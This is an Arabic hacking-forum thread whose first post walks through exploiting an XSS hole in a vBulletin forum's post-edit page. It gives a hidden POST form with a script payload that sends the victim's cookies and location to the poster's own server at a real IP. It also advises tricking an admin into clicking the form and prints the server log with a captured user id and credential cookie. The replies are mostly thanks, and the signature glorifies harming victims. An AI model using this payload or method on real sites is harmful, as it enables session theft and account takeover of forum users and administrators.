استغلال ثغرات Xss

استغلال ثغرات Xss


النتائج 1 إلى 10 من 10

الموضوع: استغلال ثغرات Xss

  1. #1

    Mangol استغلال ثغرات Xss

    استغلال ثغرات Xss

    في البداية رحت و عملت كاني باعدل احد الردود و حطيت كود جافا سكربت في العنوان و ضغطت على شاهد اولا و اشتغل كويس
    و نزلت الصفحة من الموضوع عشان اشوفها.. و للاسف لقيت انو استغلال الثغرة لازم يكون عن طريق طلب POST يعني الاستغلال ببساطة حيتم عن طريق عمل فورم و ارساله للضحية و لمن الضحية يضغط عالفورم يروح بيه عالصفحة مع جميع المتغيرات اللازمة و بكدا نسرق الكوكيز حقو
    ممكن ما تكونو فهمتو الفكرة مزبوط الان لكن في التطبيق حتشوفو انا قصدي ايه
    طبعا كان لازم اجرب على واحد ففتحت الماسنجر و الاقي بلاك هنتر متسكعا في شوارع النت
    فبدات العملية
    اول شي رحت لصفحة التعديل نفسها و عملت view source عشان اشوف ايش المتغيرات اللي احتاجها في الفورم عن طريق البحث عن "<input" فوجدت انو الفورم لازم يكون بدا الشكل(طبعا القيم حتتغير على حسب الموضوع فلازم تدور عليها بنفسك لمن تستغل الثغرة)

    <
    كود:
    form action="http://www.s4a.cc/forum/editpost.php" method="post">
    <input type="hidden" name="title" value="**********document.write(&quot<img src=&#39http://212.46.36.221/hereget.php?d-&@#&@#&@#&@#&@#&@#s: &quot+document.&@#&@#&@#&@#&@#&@# +&quot-location: &quot+ document.location+&quot&#39>&quot);</script>" >
    <input type="hidden" name="message" value="0123456789">
    <input type="hidden" name="s" value="">
    <input type="hidden" name="do" value="updatepost">
    <input type="hidden" name="p" value="5707">
    <input type="hidden" name="posthash" value="be95f743792d4b32711f574ce59f5773">
    <input type="hidden" name="poststarttime" value="1094257922">
    <center><input type="submit" class="button" name="preview" value="press here" accesskey="p" tabindex="1">
    </form>
    اولا الاكشن طبعا حيحدد الموقع فنحتاج نغيره الى عنوان الموقع الي نبا نخترقه
    بعدين جعلت جميع الصناديق على حالة hidden عشان الضحية لا يشك و ممكن تخلوها صفحة فيها موضوع و بعدها زي الصفحة التالية يعني اشتغالات السوشيال انجينيرينق عشان تخلي الضحية ينقر على الزر
    و جعلت في ال title كود الجافا سكربت هو

    كود:
    ="**********document.write(&quot<img src=&#39http://212.46.36.221/hereget.php?d-&@#&@#&@#&@#&@#&@#s: &quot+document.&@#&@#&@#&@#&@#&@# +&quot-location: &quot+ document.location+&quot&#39>&quot);</script>" >
    طبعا ملاحظين اني استبدلت
    " ب &quot
    و
    ' ب &#39
    جربو ما تستبدلوها و شوفو ايش حيصير.. لخبطة في الصفحة..
    الكود اللي يسويه يطلب صورة من 212.46.36.221 اللي هو كان اي بي بوكس اللينوكس اللي مشبوك عالانترنت عندي و شغلت فيه httpd و زي اي ثغرة عادية حاشوف اللوق و اخد document.&@#&@#&@#&@#&@#&@# و document.location
    بعد كدا اعطيت الصفحة لبلاك و فتحها(حتنفتح مع الي معاه صلاحية للتعديل و اصلا احنا عادة حنعملها على الادمن فحتنفتح معاه) و قلي انو فتحها فقمت شفت اللوقز و لو تلاحظو حطيت كلمة here بعد الاي بي عشان اعرف احصلها من اللوقز


    كود:
    [root@localhost root]# cat /var/log/httpd/*|grep here
    212.138.47.26 - - [04/Sep/2004:04:46:02 +0300] "GET /hereget.php?d-&@#&@#&@#&@#&@#&@#s:%20vbulletin_collapse;%20bblas tvisit=10940 03315;%20bbuserid=6;%20bbpassword=[THIS IS BLACK PASS];%20bbsessionhash=[HASH];%20bbthread_lastview=ax1x-ix473ysx10x%221094223658%22y_-location:%20http://www.s4a.cc/forum/editpost.php HTTP/1.0" 404 291 "http://www.s4a.cc/forum/editpost.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)"
    طبعا استبدلت الباسوورد و الهاش عشان لاحد يشوفها و يخترقنا
    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

  2. #2

    افتراضي رد: استغلال ثغرات Xss

    مشكووور يا الغلا
    بارك الله بك

    يرجى الدعاء لسوريا

  3. #3
    هكر مجتهد الصورة الرمزية hacker sniper
    تاريخ التسجيل
    Jul 2010
    الدولة
    في منتدى جيوش الهكر
    المشاركات
    207

    افتراضي رد: استغلال ثغرات Xss

    مشكووور +++++



    Palestine
    AlwayS In Our Hearts



  4. #4

    افتراضي رد: استغلال ثغرات Xss

    مشكور عي مروركو
    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

  5. #5

    افتراضي رد: استغلال ثغرات Xss

    بارك الله بك لا اله الا الله محمد رسول الله

  6. #6

    افتراضي رد: استغلال ثغرات Xss

    مشكور اخي علي الرد الجميل
    اقتباس المشاركة الأصلية كتبت بواسطة raean83 مشاهدة المشاركة
    بارك الله بك لا اله الا الله محمد رسول الله
    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

  7. #7

    افتراضي رد: استغلال ثغرات Xss

    بارك الله فيك أخي

  8. #8

    افتراضي رد: استغلال ثغرات Xss

    السلاام عليكم مساء الخيرر
    اخوي ياليت لو تسوي شرح فيديو يكون احلى الكلام صعب نفهم وش نسووي منه

  9. #9

    افتراضي رد: استغلال ثغرات Xss

    مشكور يالغلآ مبدع

    تقبل مروري
    اللهمم آرزقنيي وآرزق جميع المسلميين..
    ..
    آخلآقي سر نجآحي بالحيآآة والعلآقآت العآمهه.. لأن الآخلآق والإحترآآمم هو اللذي يعطيي الإنسآن مظهر جذآآب يجذب كل من حوولهه

    white hat hacker

  10. #10

    افتراضي رد: استغلال ثغرات Xss

    مروركو وسام علي صدري
    قانون الهكر
    وراء كل ابتسامة هكر .. دمعة ضحيه

    نعشق الموت لكي لا تعشقنا الحياة فدخلنا مدارس الهكر لنعاقب الحقراء

    ... لا نعرف الرحمه ولا نرضى بالتهديد لك حرية التعبير ولي حرية التهكير

    "....... نحن لا نخترق لكي نثبت اننا محترفون بل نضع بصمة في تاريخك ....... "

المواضيع المتشابهه

  1. استغلال ثغرات xss
    بواسطة bougassa في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 01-29-2012, 12:27 AM
  2. شرح استغلال ثغرات sql injection جاهزه
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 77
    آخر مشاركة: 12-22-2011, 08:27 AM
  3. درس استغلال ثغرات ال RFi مع التطبيق ---
    بواسطة Hidden pain في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 12-10-2010, 06:08 PM
  4. استغلال ثغرات Command ExecuTion
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 6
    آخر مشاركة: 08-09-2010, 10:06 PM
  5. استغلال ثغرات الـ Sql المكتوبة بالبيرل
    بواسطة خنوجه جامعيه في المنتدى منتدى الإختراق العام
    مشاركات: 0
    آخر مشاركة: 02-20-2010, 01:21 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •